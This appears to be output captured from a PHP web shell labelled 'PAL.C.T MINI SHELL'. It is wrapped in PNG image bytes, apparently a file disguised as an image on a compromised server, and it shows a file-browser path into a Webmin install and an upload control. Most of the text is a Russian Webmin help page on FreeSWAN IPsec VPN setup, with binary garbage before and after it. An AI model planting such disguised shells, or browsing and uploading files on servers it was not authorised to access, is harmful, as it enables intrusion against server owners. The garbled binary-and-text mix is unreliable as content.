php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/ipsec/help/
upload
files >> //usr/libexec/webmin/ipsec/help/intro.ru.auto.html

<header> Конфигурация IPsec VPN </header> Этот модуль позволяет настроить FreeSWAN, бесплатную реализацию протоколов IPsec VPN для Linux. IPsec прозрачно шифрует все данные, передаваемые между двумя сетями, и в отличие от других протоколов VPN использует существующие IP-адреса для VPN, а не создает новые. Обычно он используется для предоставления удаленным клиентам доступа к частной внутренней локальной сети через Интернет. <p> Чтобы две системы могли обмениваться данными с использованием IPsec, каждая из них должна иметь определенное соединение, содержащее IP-адрес, идентифицирующий имя хоста, ключ RSA и частную сеть (если есть) обеих систем. Каждое настроенное соединение будет отображаться в виде значка на главной странице модуля. Зачастую детали конфигурации, которые вы вводите при создании соединения, будут идентичны в обеих системах, только с заменой <b>локального</b> и <b>удаленного</b> раздела. Каждый хост, который хочет обмениваться данными с использованием IPsec, должен иметь пару открытый / закрытый ключ, используемую как для шифрования, так и для аутентификации. Каждый конец соединения должен знать открытый ключ другого конца, который можно сохранить в настройках соединения или найти на DNS-сервере. Функция <b>Show Public Key</b> этого модуля может использоваться для отображения ключа этого хоста. <p> IPsec сложнее настроить, чем другие VPN-протоколы, но он более безопасен и способен работать и считается отраслевым стандартом. К сожалению, есть много ошибок конфигурации, которые вы можете сделать, которые могут привести к тому, что ваше соединение не может запуститься или просто молча потеряет маршрут. Хотя этот модуль защищает вас от простых ошибок, он не может спасти вас от более серьезных концептуальных проблем. <p><hr> На главной странице этого модуля находятся значки для любых существующих подключений IPsec и ссылка для создания нового, при переходе по которой вы перейдете в похожую форму сведений о соединении. Под ними находятся значки для редактирования глобальных настроек (таких как используемые сетевые интерфейсы) и отображения открытого ключа системы. <p> Если вы используете FreeSWAN версии 2, вы также увидите значки для редактирования различных файлов политики, которые определяют, какой тип связи (зашифрованный или чистый) будет использоваться для различных сетей. Как правило, их можно оставить без изменений, поскольку по умолчанию используется шифрование, когда это возможно. <p> В нижней части страницы находятся кнопки для запуска или остановки процесса сервера FreeSWAN и применения текущих настроек, когда он запущен. Ваша система не сможет устанавливать или получать соединения IPsec, если сервер не активен. Кнопка «<b>Начать подключение»</b> в этом разделе может использоваться для принудительного создания туннеля IPsec, который не запускается автоматически при запуске сервера. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`